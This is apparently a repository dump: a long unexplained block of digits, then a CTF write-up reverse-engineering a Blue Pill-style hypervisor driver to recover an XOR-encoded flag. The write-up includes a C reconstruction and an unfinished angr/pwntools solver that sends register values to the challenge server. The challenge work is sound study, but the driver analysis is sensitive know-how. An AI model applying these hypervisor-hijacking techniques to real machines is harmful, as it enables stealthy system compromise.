1197486212917800869345426831697497314158435855030854766501573290008416644595436788395414817728167952672111426292356377826742129828744062971019733470824649938811493497955424226530647669795288217285600243840029791690620498305191350385796390954427713615361869568921647392954465124077037681991105913767125689559706491144514493907617395383505499808444288402837649554324160708238091308935463929954615957046150184452446545107454176014373481953808147035619894542243063968716906870808965747571998497083488866144601569854157904338639592281258574575140907082123655917261989535407778212215780915587393459021327362372632286087893238971834648345065047151584975754513269202841027539902483899379551538507396767659174970308798963021505552068277873380428950301668556813981272480090547764781716571039066402359797927522912201621783124083114840007205182827355379409104999053546225994642443753566307588742038015160599783440072209532406760168049189907575161177763415947621207871029748455084731340132982683794047614953232597867221342042326228921936250808407320353471239231601086490614163231234003321403581142812743305897018597102249403652152757443906952231719655114876839417541735916022571788936535894312771080556894087746872371045704691655840812395102045891948754636026811672785316762109681551374369412768176133548190301994819462858886162174714221790679532421847711431139469524093287556752501193342607112557882789720389308683053466605384968059840550140881830558188667759821801766124345678914877902788922545941794479884552210127900154227690056927467861593506596602010814854564157863092000989481647621299207079057099433771602702666963876514733351114914021757449357728047933796213133225103511966149047441080511969386612710454402299454753495021820674832019751642320922689718798099740053093995216493953625751043752896052622141962944013589124681387720895503338711283431411335178141004494558480207650115095787990482828146285998229960535873161402840425325045070454201665746699301286545303011722882621137383294186618537678714982317947702855225548591475020101901176572745130307058928314974790506862397400689037261317820825121767290827708267560117279802953702174534526819689340406737544980603317547302616079013341648355800242908173209535135341605280760707095365546693978470014268175232562598932215192598080138145133067346802417778709421156762132236173699257188795590222105652465135969493388293834312080716187555745906921200094528830230551080702512497295611678759454611459558966439272230555105669446693808330145839190760969790245539562214509148837853097545528801069892205321516444586010516307049095813885087362738488657749228082833237103530407105347151397272316096520252234555839149203463514961935884808502313997252485416303309880583708946269733201974213026610716333403224164337326247571446922675636572972669102502597251115779693118243542880530262265367558198283473653721370054532169745888102231194879883878019700748828216346623144566116637890880790642295938723564970491337484342349385215378203877852887456904275924669747252202632628682398060105054516114904121093473575526128675712141024678348167048304982907048657209003209115841722068525703483642600781842391115394441623597503053347303415888400951376562605036932370437743433046754204880998069749662919505122714377051212350443835561352307112240492365809686065631687550576269581706500677669868677293220353603799175548836665761802982833330387118207670686169704167166346106428980431088747783899913902899720647608055184171653955071801037374316738129296391110294125041221196919324778753518976362143134717695838215940587278919317890551169558043217026152415376275804096396837864901248428784979946783253903347551995707252185123780059997128171542737209305019387057226777074695699983309350663142240535067402760500373978497426883733654290734312774812715504859705644477851895766142092546110321040525946024511609732636782592752080890043607321970782053895686105069237672063944031268700125413891056748862609311278426864162413125571534702681613648098772188141473619644130278688036679410148669786953839094040388951171703812155605798773171137759500064567003553610239346125739211582738115428211133182316522041054468473571106887032988607867611776906273702043936857292515341975954077704329432775871761309484726777495777452154834580437538448078570348085687431077640149276500044543146678966365010483840456801289274918830934496795506412673465928996428706844232683353332105910111608616177512703087884890563056731648036980938934466105555662432292442738812427547888636703922314569973162778700631273314372798917646823167938998446591011982148255044412804781097489963546761992699029464059818132757386811601038071584675781136760930662874999186573011929286494211265436931185436231594953645139687622448262375350186329463763204760918724643873640716671388890523335473245625989927682321336265494870985988578233312919993196320738138604158793124854218496518533667521248027663913446532991267733887962820318417298583766902369516919898674008162421999524095356275990365962408511825125571484808920334374486974772347730854813554092975092637549242291750009046831420004515691581592423886368486947198559354461324058158299896260006813690015616162594147581233458255028618800503904799123673055254772651791262042976867007454460045624997711309880862493952415242075731497163450083346073362204284565477486554214210621848292371067793759493200081358930180502807258817471679517370678913438997139479902209277220935296736796289094760476013856102870853169699998939852474241554720083437885506370275948445034967925250973164118121584824116301866178260385911023797871199321868477528252621359274000633109992211710938253889970829442018990907387611679770905827059159164188249887904766094917195153906388450379590028124543033817054970552045330770408789616400608323064744197542319612483380217371461957413907841476256344326684148852360468173473483837831559723564937616308193304602347974829527113152070010548020752130261015579177186081210049253478264629215417690331519349808905719767703300881108084603503930428068244976237909182267142454870959229441176847497262449787254077266275225356989061242447009485385378020230644348415462262583063526817429369975585518383506691119036640730882511569627417200966273021808616671411176606225151807714905524706772383585455337780131545209883341964429719506129173289083599970704273020895451338801473785342105685761445292863355014076005822740773627432133149081847029694013605388046559019197753483100259670527556868980166019629667707027588604496742505567384591073864145684916368026991507553186982704012997924075475441520553599306701438256807383946821166917984907112453737515502368872078521598085134290382010114955834395136313984681028833045272681529254555162513950156399493921704696903076761212049782651078206523719108549686728987292082782493930993003566519046556250854434680281816916309776544591931931279980225183817952795121373500174920433599687289845933750068427486646687435310729700535764146141119671513240666572174097140458439035998111486597679628400003751689395894417982094603146919833446711371314923124073800590349180994657183732597715953332676407879579092550863937766304369106480230526911400972851632186201243509447494685715523544148819040311210642108909546235527383307098700500860440304861499308198310719969069827695787789090818442591252637314003645125694294594191553588742655767530047610938635122813907508237256807831260619355328769532496605417113698941058228384791722806723066094942659118672391061684285614679001963648036274939664429311927481319597318271855561062623423242010758027792259874547796224358931651504162740772339586286373551055879155667309182712648841822802402059768526919037140588193895547150776912321470802037862402244274655866696690012624221450825695707739267236220232959525493192317540683544090590270270505157692865908029149559421746466431462968941856438991869548355882009972530846137871113651515931907848085756782038871553207322365627618946769625145639390356398949186136487700038717296439542864848731510624791262486544426753002369795333595823177002456457554680046001589109198309909735510437463016335743723096617435145207180533036226165140433305178881434524069332185379162167209699786083929833021644092950591410977341246100727418453937816257581194809607767235720733246785071289266424713525071320716484370837252582765718833682879979456600484884236168503004752830822584525249174374350244444491828411032749500520783836454541656984309125617749722926046061457340777253256187397157266483347712335346951670488149732859260249290260898060344965235989327262503208230942900065370971424865982316791854377062146785848572582562641167765720068527912450170348898100925661017810099122384041867989794656134116084594979032507106257314954780941734426882775391923801721661819637981732601316006547665577297349180039466695732163875255606338253267512023383598638219618372140398885731385575394913896783038707232672984201437772188560127621150375940718701727204995306611144470578171959998827076300579211155168277378610401709245480251263877083717182528311615916597146653569218970047992606222354744835155882745298705911882530379669381904972247244467547357670205664390754589060339542379108916068053412717758327784916845953840966839103998687628218860134976816954370798041865015747809025343740152132899963877794915674282613227453375302057643951337369724298110530652930378707527912097399383343402402979891230924549978336163528140966412988949314851882427697815254369711222546844981199061852319612467194104739415249009158054411829410551880406018958374640501180100745774173378150906234418918703648682026493309325792924098481793761091560544801612998807062096036186177527101758447216813192167608265827997515596947735413362270342400795807065365930527141150225465462290029972744450380182658494166297185735769250375314718094199189825343577134149218770405979617412011006690924173765626588531973586619124114862216340295679180123460108010156870194371735450864221622882534560758375784893508751771120991059952510577365753278901510454248274662041521537926386236409391391086571710618447029546347696456069586635342873654020793245632214964701544468735180226113774034038365218418029457255745875380248818179737513419442338514043113226409436000316984305657099116991873136140695824357805397559461100210724908382034312081472281461180494719553187769712858961287850621589573912385807439871055192010149054995345412986184792520469216981704619232543164302439816463568432180087512213508280311007198404180559286426991680246517425911650744177368353214591020958777571798736793082358518086949007064660180882876767808377953563276575644390285019247271076462033687113342676332203517815592510827771036082260663176948678686763164643593997648934706048451015224579228323041406210441205406828319092435743502783695462538920934785456292402194541329325746231968224094190871112106038551686039111096835920766726651588163840370563098666822214068311724425927382622176343834232156903899902310141442499859982866234003485752411972536237021049922276916697728377612685326182296834129587897184363945735049421110185000190605505855734239978715749976224834687536776085308464306620731229923072920340517327215929250036784602425848649092980132644689380706904258338240720738463645438005888168842281675638194877006482661036584789828784642088836952398179190812096596689976500034061730798167649923476319193414405106622416333800406401720386186677596233437040993319045022191545371399825048498543955948238961991478686188742062721047992852510308186295296221683218245439310153140745940455768116109721419017449176702091493194186286302278428324799641219526536294054084330206751557852773121944008210608422318441435337797665820028884610172208940402498439748269922772707566171374644087288986443765976326547508514827779344815158667505124817653471286618386284225882660480155645773180210896578608383796946642161709389550926688105956548765361458439116068901029804569858173576041118972394031136628784333066911553855384250173453560237916748547517260952622189052454550582278408321600143953214554478867133338658973157352902316182808894982764468169490060290530657762559254089967372536063026074523507484708997786232071207151878100469576697141997802461379204947579454202488441323596114903225241417234856489224800638207590947005980793393445558465644986181778090006156785625834630560261171485425676655637182508285334585861883945711811184440047850048879285440516085874331352031715319212127449598723213029165037917514052768541817856093524754728076058472430152190145163376215696590468979410351541153076927295153671097921661898491099782640507765273248394154215473807176098996433141794127233750980636606200355681156482171366836655742836645223349868670917828013454661109824693900234930869899508443669472973431314413384415431835014639871806167598524096196996480441053875070391183525640141963825114228188031454370180674397003519499611620119444698337244156450915073055400663962580654983714491256319241155550598203634835652425839854258354609773897927473598028608875726377223069911670461586886854524688813932926568191333002241246977352735784427529283628969966809328637644708577448153858700749186839321104419139532694036136653399085772512242672326426544382279164920890923163441246572669495182242316171265353736790304069385419842675343810993697464562341795414991469955250934407505340817806137146349557261597576574372172184464245851363454638884164746494341795321312840980885112322639355080503599669795278159551808637428700209306144571437975632217175844635701087663808353735067654751971702227999006932120680087929820263056719686391680940951129517206968344593750286858238653583851345321453713563792221201913218455428903427348983847507452723280560238560146059096598086072051550444703592226079586536773934238835265585699937221649640835478060854048065629950658843373466382756882194536336869659202166778828638871737237213774429311319480432582068117892130083643037907142289372219214823458869840510140528219514602170469647347260840855223778180201209920641806768390478513931209202158378629051749894474299110463523418404215099120066685749685522970120904003698555295528181641348176846833776428987639534837161247414342368838230912458540358174357458825651590563572813014792204271973522426908923174118300789336280817596353988387119734591685844290004858033634478196871831279840561881444714537484363679833733588359314842829917902848175182849215462365831918943228554742859188836233753477612500619823009179265442556707794411335948042847533637278834812511223856211835205614779059524412488937398809639777532629793127818886455848455153208379671229294430627022643710488964064327522096006823482346046309737298540302255338713963421262919831503358805362722130372677913903748808290220130848903575643075458042587274105161613794177155743942831856923634158121761266179262863050915707367315519906885659869964865037769204715626283697711438751013433866694771878529005682831402446018230995649917564793621340607921072809753616547762282105575948436147821509174069431289203010555731407836706842947189691783405490254759679988461615323547869969709233359418931779033389163382510636136716653595814683847647144832299798473750385378460438583477892964164943078387164654454961377737265232197878661601278318468485292859962093504494538692226080509979847872141872346825882193097674415627387279718997249258392084476043770769704086290094552460200672939512711113808103731608224353457536940917435107645517299623978525880685436711813154714974442759555592248484356986689002508397800445196094156463151712758417853417185958187436250302000732058667312639024031049318600299456098380123075095317562219556722541950851819610910727828410024502164294813783154752181725696821500383065232875210735594666411578345236267689714941253128372028237430251845654439844899758753848774388346718541978444679665568523571411113369345972197624635465446541708009879602597126045225472892082673377512699513563112283830864375904390835907927764611156169929585417974903166465845683427630699444988667877555378145766284674732468699784391990079127801936505243079007549527859994795763235742278102500664588006290399604747992741216490202581496097315094510749589714512052152890232587916371642515840297231696472142119301468776963729613672453731025681903517943978403305195080841659057735433004962636515563675801738622214809913552588718231510732603884988884163698371637834620119804211707659877401412258328020586036925860451987723651443969868930383961419380334263470657661082939113600225109767441908364525475036408261689260455915134339610512627847003689393777604702120239790425172347612018276305602996316668609097686657812247557584068563849427353063806437679217200566184944436763537942133747440238650240508179654319234844047727275254290405771963878896316929215296419515386726138108227960339000500719162199280150773683606747214159005135370122627423194935431310089540653424858115193322309243697344820110056474320860180177897166281005685803877926432567659171190305799814895279465917104396066712446380787003082972002440806806617269684188746325132615058256040966780515444074694403612922040067620307828720895875684980653242187604624097951616639179031934987305356490271636900079138969662642992798168917398743930194819558657720687641945446760281064088846386455914373140036397781964398436895926998637446821872783551779703560481603719375337980822137051239445546599741351272212039227647158047224570162410174465549011960600297893779415887326819752503752966356964242024237379815993818230760253072310402139647762427636499279831482022504191778596212643892300029231263075855779497442282885558312673455192412383504252886308016751099615776299124191583482519230679385194141031962189097941186537126841999295119418257263459952414371301574772679398572852269501015859701472856293797716751326363827585362705417078015100449064171369821360761305579682019448144438230174911610127955038755187775721941726214766868787013734131962639402233678941122873276885418487012272808388142934848706738992838491120016476513080450721958308901533264224479587865628308205381859912210786121986951703973851715043249658014496315541158854613176846503242045136336300018457987089183585506955567070495587811817847722809020779592753755331317299646184730451871273026201972973441410547120784073722929971718723057036816752297986672930282341134415475329865283696456282901187692504753503243416256955412374837157158789318236025122176679185605877582741365033317097400160405476898695791480711854535521628994559941703848626372432952776097576008513569369694579636582399707506959292770229425226702701559654241652798573767138909319981031175257828439758646548117676101345399634556683030889580614208625536908797861303871286801231375408583393150252600627967496516496859369265256197234627949173048495310248863526524233578796203409843675122714684585073741224574796675712694516167258669100301368027433748237620227065555952344187572594345711853656400339196255698333613416245073518276052943810740976730583060229169559768227059153243295996696804448852231358297571732365055257046330445647952452794083009760554249307711957842187811441596105165357136456184050429043788408320762881741901144406982604128141775995173842144163286426072751774089908635756740788555295791626787101433045117170428100678531743473779641316118242487870156202719448137328030319711470349327241750886341668661986974380468179906459914681932194503628877278012967917230166908472274353160811992863536590415063152564026272014335758861578615704456672699157638105297010210144111252917804621832867150563931157545629897473413077078844575812995900637902264636698990716196112338725945523050696310241326312707029305086234987446837907652863173381233827284763666697313074617856376652784281700900843107309469594463172135370437437439878211422829278331937857598829121248047322207313675788434820438347750789000235938064469851410533706119836367831222465855531525084730735862727605482772076875431162178982774753132514002511112157331427071767007455272811562587059239727281423520678152844879662009139034967518711725224441360679933223450938314357700078402163441352833860025667600939605627358850123366407288101968838433691573487237103993073838843186233197463164974673156407961411258836714858201294094390002245426533077592627949285870652066387301145664503401898772391136914151502104256301289817119496816130952287388980497146667722457279596232934690975581717667318267096017179023741904453731076980869731523235184302168522803571154549032949892418506655090403008739143696948529393853973795731031637712618119325124148025528334366617256236339019562089399924721311227544696107173569806867153442214934388295034263253529096145437692721394138870541498334679464861262023695053829243084421449388812604207082309139530332840628431873098835963961191105647747710411263462512066139132970045941599172788319925422497908294428723136955554395746050105484781118492649557522521135523442786403976456133645753229417620734386934584304140195943424585309683932608353554266462229477995243505626320841295192567574448780771494738596066344808820584590233782032681165629860715243235818374255260485326869686443919444433554627385044450123865190526972273037124799439949555918913647296618774537636818062845440236935496369648313140109464160220229579946549912143439561358120592041724882912277018697803211767796679976178542656173547168720276355752769281020237003044742723317031759976166549589295515662578532803905588554414734395671029868329190836961327972891254990142042387328708651962300909967697059544792174746984649629405523266917887796245474849606313193867514613831099811928789188538489473523846055224408280922573997178430264669881383141781479351759348271389498191939527697069742197565659478911211587935121229797937795951675464168164030058926583509724998016241251121957158036926764078338202081099685275422475776614597148944937826703477618768128935093461146478429300512403051366970259411646030510607038047955013494998115531324666993898537792200953978384605183989695675198285108306395343879956970794632019162205807876366988945233937317563035642698351608824828990340587101922951455865172143044701500523700259374480826735315240384943337468086658090066177796782486828975388272531756459246730155854481599456159371186666562730762173146767223642481260892252207808092845271349959097262607563776811436416388636696596767185005880956180464046901518201608545932739733684516741138237999204803052672667250556094269027560379836159769073639440106403257827756316664107979322057402123601127709653337334711009392087361691698872663443051622809033113662666263632208596522394201314769088071553778781036986489983917487864130085735815087140008566607180655876019004613178570323057460592448747787563224843577420267979876620352106706251860656603288125274530177598089427445272612569709123036092116689412278527879867316853194018539887486883279337754535726527758157964672712092842999831864444523882891387016925624774692350363914716676066752049743402090861008062669270367010634535843740089000247560939882872597158893486933523402097606889308036219216769281420541529773339254395868841540111843448607402819031484257939550357378963112452304436403282321733035783617988005085713625258084517641304770802153682480270713512586933027412528284142722821140630302150629727055602127751322964385706156677828467158775726187008542827135258610512796663988157898886277502616497694716398815970133277435065490140585609993159768935388945480829018992976796525314111856167466273083621860211663437715957096579536241372968396768477508610253386841109241318160235434570419869397558817866662932845545026809184300233364289322725557836947146349547875525031558469527589987963345611154138374327681512376806371727316956885673857324583676532488437841981053000889976128689293221453330923822250787255722850819914378682009854822821580050200026309883249084845580979746260511181405300245420005712745013773699279430772783499597749247146174847608685783675896890047813059285911874239872397229426551326197389222062748122768456823495911747712364897287261815394062112793781540511156094665183551791020577573971793684748007299406881038802422615719947505758694674293678375881555312699


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/README.md:
--------------------------------------------------------------------------------
  1 | Trumpervisor - RE 500
  2 | ======
  3 | We are given a Windows 10 x64 driver which uses hardware-assisted virtualization features of x86-64 processors.
  4 | Unfortunately, the solution doesn't take advantage of all the capabilities of virtualization, but it was still fun to reverse the driver.
  5 | 
  6 | * The driver basically implements the concept of [Blue Pill](https://en.wikipedia.org/wiki/Blue_Pill_(software)) - i.e a hypervisor which virtualizes the whole system, and is loaded from within the system - we'll see an example for that behavior later :)
  7 | * The driver code is very similar to [SimpleVisor](https://github.com/ionescu007/SimpleVisor) by Alex Ionescu - I used it heavily for reference.
  8 | 
  9 | ### Driver Analysis
 10 | The ```DriverEntry``` is at ```0x140007000``` and calls to a function at ```0x140001450```.
 11 | What that function does is:
 12 | * Creates a device named ```Trumpervisor``` which is visible to user mode applications - because of the symbolic link to the ```DosDevice``` namespace.
 13 | * Fills the device's dispatch routines table - all of them actually do nothing except ```IRP_MJ_DEVICE_CONTROL```, which is handled by the routine at ```0x140001390```.
 14 | * Checks for the existence of a previous hypervisor (like hyper-v). If one is identified, the driver returns with an error.
 15 | * If a hypervisor isn't identified and the processor supports VT-x, the driver sets a DPC on all of the available logical processors (using ```KeGenericCallDpc```) which loads the system as a VM on each one of them. Also, memory will be allocated for virtualization data (VMCS for each processor, etc...)
 16 | 
 17 | The DPC which finally launches the system as a VM is at address ```0x140001740```, which is also called from the driver's unload routine. This routine is used for both launching a VM and unloading a virtualization mode on a particular processor, depending on its arguments. The unloading part is implemented with a "magic sequence" which we will see later. The launching routine is at address ```0x140001630```:
 18 | ![alt text](https://raw.githubusercontent.com/dapollak/ctf/master/Hack%20The%20Vote%2016/Trumpervisor/pic1.png)
 19 | The function gets part of a big memory buffer which was allocated before and will be filled with data which is needed for the VMCS initialization.
 20 | We can see a call to ```RtlCaptureContext```, which saves the current processor state in a ```CONTEXT``` structure. Then, ```vmcs_buffer1 + 1460``` is checked, and if it equals to 0, ```enter_root_mode_and_load_vmcs```, ```initialize_vmcs``` and ```vmlaunch``` instruction are called.
 21 | * ```enter_root_mode_and_load_vmcs``` at address ```0x1400017D0``` - enables vmx operation (```vmxon``` instruction) and loads current vmcs structure pointer.
 22 | * ```initialize_vmcs``` at address ```0x1400018E0``` - initializes the vmcs, a lot of uninteresting ```vmwrite``` instructions. We will return to this function later.
 23 | 
 24 | At the end of ```initialize_vmcs``` we can see what the guest RIP is going to be:
 25 | 
 26 | ![alt text](https://raw.githubusercontent.com/dapollak/ctf/master/Hack%20The%20Vote%2016/Trumpervisor/pic2.png)
 27 | 
 28 | RDX is the vmcs1_buffer from the above function, and remembers the call for ```RtlCaptureContext(vmcs_buffer1+0xe0)```. That means that ```vmcs_buffer1+0xe0``` is a ```CONTEXT``` structure, and ```vmcs_buffer1+0x1d8```==```vmcs_buffer1+0xf8+0xe0``` which is ```CONTEXT.Rip```:
 29 | ```
 30 | kd> dt nt!_context
 31 |    +0x000 P1Home           : Uint8B
 32 |    +0x008 P2Home           : Uint8B
 33 |    +0x010 P3Home           : Uint8B
 34 |    +0x018 P4Home           : Uint8B
 35 |    +0x020 P5Home           : Uint8B
 36 |    +0x028 P6Home           : Uint8B
 37 |    +0x030 ContextFlags     : Uint4B
 38 |    +0x034 MxCsr            : Uint4B
 39 |    +0x038 SegCs            : Uint2B
 40 |    +0x03a SegDs            : Uint2B
 41 |    +0x03c SegEs            : Uint2B
 42 |    +0x03e SegFs            : Uint2B
 43 |    +0x040 SegGs            : Uint2B
 44 |    +0x042 SegSs            : Uint2B
 45 |    +0x044 EFlags           : Uint4B
 46 |    +0x048 Dr0              : Uint8B
 47 |    +0x050 Dr1              : Uint8B
 48 |    +0x058 Dr2              : Uint8B
 49 |    +0x060 Dr3              : Uint8B
 50 |    +0x068 Dr6              : Uint8B
 51 |    +0x070 Dr7              : Uint8B
 52 |    +0x078 Rax              : Uint8B
 53 |    +0x080 Rcx              : Uint8B
 54 |    +0x088 Rdx              : Uint8B
 55 |    +0x090 Rbx              : Uint8B
 56 |    +0x098 Rsp              : Uint8B
 57 |    +0x0a0 Rbp              : Uint8B
 58 |    +0x0a8 Rsi              : Uint8B
 59 |    +0x0b0 Rdi              : Uint8B
 60 |    +0x0b8 R8               : Uint8B
 61 |    +0x0c0 R9               : Uint8B
 62 |    +0x0c8 R10              : Uint8B
 63 |    +0x0d0 R11              : Uint8B
 64 |    +0x0d8 R12              : Uint8B
 65 |    +0x0e0 R13              : Uint8B
 66 |    +0x0e8 R14              : Uint8B
 67 |    +0x0f0 R15              : Uint8B
 68 |    +0x0f8 Rip              : Uint8B
 69 | ```
 70 | So, we know that the VM entry point is going to be at ```0x140001653``` which is one opcode after the call to RtlCaptureContext.
 71 | We can see that just before the vmlaunch, ```vmcs_buffer1 + 1460``` is set to 1, so when the VM will sstart, it will go to the second branch in ```launching_vm```. This is very similar to the operation of SimpleVisor I mentioned at the start.
 72 | 
 73 | ### Ioctls
 74 | Lets see the dispatch routine for DeviceIoControl - 
 75 | ![alt text](https://raw.githubusercontent.com/dapollak/ctf/master/Hack%20The%20Vote%2016/Trumpervisor/pic3.png)
 76 | We see two kinds of ioctls:
 77 | * At address ```0x140002210``` which sets RAX to 0x4141414141414141 and calls ```vmcall``` - Sadly, it has nothing to do with the solution.
 78 | * ```manipulate_globals``` at address ```0x1400012D0```.
 79 | 
 80 | ### manipulate_globals function
 81 | ![alt text](https://raw.githubusercontent.com/dapollak/ctf/master/Hack%20The%20Vote%2016/Trumpervisor/pic4.png)
 82 | Basically, what this function does is xor the bytes at address ```0x1400030C0``` with a cyclic 4 byte length key at ```byte_140004020``` and prints it to the debug stream - That looks like a CTF thing, so I guessed the bytes array at ```0x1400030C0``` is the xored-flag. Trying to force the 4 first bytes to be the string 'flag', we get that ```byte_140004020 = [0xb0, 0x93, 0x13, 0x80]```. Then we xored the next byte with 0xB0, and got '{'. Sheer luck? No, it's probably the flag.
 83 | After xoring the whole array, we get:
 84 | ```flag{..........................}```. Close, but not exactly a cigar.
 85 | 
 86 | ### The nc server
 87 | The challenge comes with ```nc trumpervisor.pwn.republican 9000```. After connecting, we are asked to provide register values. Then, we get a hexadecimal number back, and the connection is closed. The registers we need to provide values for are - rax, rbx, rcx, rdx, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15.
 88 | I couldn't figure out the connection between the binary and the server for a few hours, so I decided to check for more ```byte_140004020``` references in the binary.
 89 | 
 90 | ### Back to the initialize_vmcs function
 91 | The only references which are not in ```manipulate_globals``` are in ```initialize_vmcs```. There are 15 references there (like the number of registers in the server minus 1) at different positions and blocks in the function, and it seems that the code bits which manipulate ```byte_140004020``` don't have any connection with the opcodes before and after them:
 92 | ![alt text](https://raw.githubusercontent.com/dapollak/ctf/master/Hack%20The%20Vote%2016/Trumpervisor/pic5.png)
 93 | Moreover, we see references to ```rdx+0x198``` and ```rdx+0x1b0```. Remember that earlier we said that ```rdx+0xe0``` holds the processor context captured in ```launching_vm```? So,
 94 | * ```rdx+0x198```==```rdx+0xe0+0xb8``` which is ```CONTEXT.r8```
 95 | * ```rdx+0x1b0```==```rdx+0xe0+0xd0``` which is ```CONTEXT.r11```
 96 |  
 97 | For both of the above registers we are asked to supply a value for connecting to the server. Then I came up with the idea to extract all the pieces of code from ```initialize_vmcs``` which manipulate ```byte_140004020```, translate them into a C program and got:
 98 | 
 99 | ```C
100 | #include <stdio.h>
101 | #include <inttypes.h>
102 | 
103 | uint64_t context_rcx;
104 | uint64_t context_rbx;
105 | uint64_t context_rdx;
106 | uint64_t context_rdi;
107 | uint64_t context_rsi;
108 | uint64_t context_r8;
109 | uint64_t context_r9;
110 | uint64_t context_r10;
111 | uint64_t context_r11;
112 | uint64_t context_r12;
113 | uint64_t context_r13;
114 | uint64_t context_r14;
115 | uint64_t context_r15;
116 | 
117 | uint64_t r8_reg;
118 | uint64_t r9_reg;
119 | uint64_t r10_reg;
120 | uint64_t rax_reg;
121 | uint64_t rcx_reg;
122 | 
123 | char globals[8] = { 0 };
124 | 
125 | void main() {
126 | 	uint64_t i;
127 | 
128 | 	r9_reg = context_rcx;
129 | 	r9_reg -= context_r8;
130 | 	*((uint64_t*)globals) = r9_reg;
131 | 	rax_reg = context_r11;
132 | 	rax_reg &= r9_reg;
133 | 	r9_reg -= rax_reg;
134 | 	*((uint64_t*)globals) = r9_reg;
135 | 
136 | 	rcx_reg = context_r13;
137 | 	rax_reg = r9_reg;
138 | 	rax_reg >>= (rcx_reg & 0xff);
139 | 	r9_reg -= rax_reg;
140 | 	*((uint64_t*)globals) = r9_reg;
141 | 	rax_reg = context_r12;
142 | 	rax_reg += r9_reg;
143 | 	rax_reg <<= 3;
144 | 	*((uint64_t*)globals) = rax_reg;
145 | 
146 | 	r8_reg = 0;
147 | 	r8_reg = globals[0];
148 | 	globals[3] |= r8_reg & 0xff;
149 | 	globals[6] |= r8_reg & 0xff;
150 | 	rcx_reg = 0;
151 | 	rcx_reg = globals[1];
152 | 	globals[4] |= rcx_reg & 0xff;
153 | 	globals[7] |= rcx_reg & 0xff;
154 | 	rax_reg = 0;
155 | 	rax_reg = globals[2];
156 | 	globals[5] |= rax_reg && 0xff;
157 | 
158 | 	rcx_reg = context_rdi;
159 | 	rcx_reg -= context_rbx;
160 | 	rcx_reg -= context_rdx;
161 | 	r10_reg = *((uint64_t*)globals);
162 | 	r10_reg += rcx_reg;
163 | 	*((uint64_t*)globals) = r10_reg;
164 | 	r10_reg -= context_rsi;
165 | 	*((uint64_t*)globals) = r10_reg;
166 | 
167 | 	for (i = 0; i < context_rdx; i++) {
168 | 		rcx_reg = context_r15;
169 | 		r10_reg >>= rcx_reg & 0xff;
170 | 		*((uint64_t*)globals) = r10_reg;
171 | 		r10_reg -= context_r10;
172 | 		*((uint64_t*)globals) = r10_reg;
173 | 	}
174 | 
175 | 	rcx_reg = context_r15;
176 | 	r10_reg <<= rcx_reg & 0xff;
177 | 	*((uint64_t*)globals) = r10_reg;
178 | 	r10_reg += context_r9;
179 | 	*((uint64_t*)globals) = r10_reg;
180 | 	r10_reg -= context_r8;
181 | 	*((uint64_t*)globals) = r10_reg;
182 | 
183 | 	r10_reg += context_r14;
184 | 	*((uint64_t*)globals) = r10_reg;
185 | 	r10_reg -= context_rcx;
186 | 	*((uint64_t*)globals) = r10_reg;
187 | }
188 | ```
189 | 
190 | So, as I suspected, the ```byte_140004020``` array (which is the ```globals``` array in the code) is influenced only by the state of the registers rbx, rcx, rdx, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15 when capturing the processor context. Then I decided to write a script that will find a possible state for these registers that will cause ```byte_140004020 = [0xb0, 0x93, 0x13, 0x80]``` which will cause the flag to be xored currectly.
191 | I used the symbolic execution engine [angr](http://angr.io/) with the C code above:
192 | ```python
193 | from pwn import *
194 | from time import sleep
195 | import angr
196 | 
197 | REGS_ORDER = ['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15']
198 | 
199 | def send_regs(regs):
200 | 	p = remote('trumpervisor.pwn.republican', 9000)
201 | 
202 | 	for i in xrange(14):
203 | 		p.sendline(str(regs[i]))
204 | 		sleep(0.5)
205 | 		log.info('Sending {0} = {1}'.format(REGS_ORDER[i], regs[i]))		
206 | 
207 | 	print p.recv(2048, timeout=1)
208 | 
209 | def find_state():
210 | 	log.info('Open angr project and load entry state')
211 | 	p = angr.Project('a.out')
212 | 	state = p.factory.entry_state(addr=0x4004ED)
213 | 
214 | 	log.info('Creating and loading symbolics and constants')
215 | 	context_rcx = angr.claripy.BVS(name="context_rcx", size=8*8)
216 | 	context_rbx = angr.claripy.BVS(name="context_rbx", size=8*8)
217 | 	context_rdx = angr.claripy.BVV(int(p64(0x400).encode('hex'), 16), size=8*8)
218 | 	context_rdi = angr.claripy.BVV(int(p64(0x1aa000).encode('hex'), 16), size=8*8)
219 | 	context_rsi = angr.claripy.BVS(name="context_rsi", size=8*8)
220 | 	context_r8 = angr.claripy.BVS(name="context_r8", size=8*8)
221 | 	context_r9 = angr.claripy.BVS(name="context_r9", size=8*8)
222 | 	context_r10 = angr.claripy.BVS(name="context_r10", size=8*8)
223 | 	context_r11 = angr.claripy.BVV(int(p64(0x1).encode('hex'), 16), size=8*8)
224 | 	context_r12 = angr.claripy.BVV(int(p64(0).encode('hex'), 16), size=8*8)
225 | 	context_r13 = angr.claripy.BVS(name="context_r13", size=8*8)
226 | 	context_r14 = angr.claripy.BVS(name="context_r14", size=8*8)
227 | 	context_r15 = angr.claripy.BVV(int(p64(0).encode('hex'), 16), size=8*8)
228 | 
229 | 	state.memory.store(addr=0x601088, data=context_rcx)
230 | 	state.memory.store(addr=0x6010a0, data=context_rbx)
231 | 	state.memory.store(addr=0x6010d0, data=context_rdx)
232 | 	state.memory.store(addr=0x601060, data=context_rdi)
233 | 	state.memory.store(addr=0x601090, data=context_rsi)
234 | 	state.memory.store(addr=0x601068, data=context_r8)
235 | 	state.memory.store(addr=0x6010b0, data=context_r9)
236 | 	state.memory.store(addr=0x601058, data=context_r10)
237 | 	state.memory.store(addr=0x6010c8, data=context_r11)
238 | 	state.memory.store(addr=0x601050, data=context_r12)
239 | 	state.memory.store(addr=0x6010b8, data=context_r13)
240 | 	state.memory.store(addr=0x601048, data=context_r14)
241 | 	state.memory.store(addr=0x6010c0, data=context_r15)
242 | 	
243 | 	log.info('Stepping till the end of the program')
244 | 	path = p.factory.path(state)
245 | 	path = path.step()[0].step()[0]
246 | 
247 | 	for i in xrange(0x400):
248 | 		path = path.step()[0]
249 | 
250 | 	path = path.step()[0].step()[0]
251 | 
252 | 	log.info('Finding initial state')
253 | 	solver = path.state.se
254 | 	solver.add(path.state.memory.load(0x601039, size=1) == 0xb0)
255 | 	solver.add(path.state.memory.load(0x60103a, size=1) == 0x93)
256 | 	solver.add(path.state.memory.load(0x60103b, size=1) == 0x13)
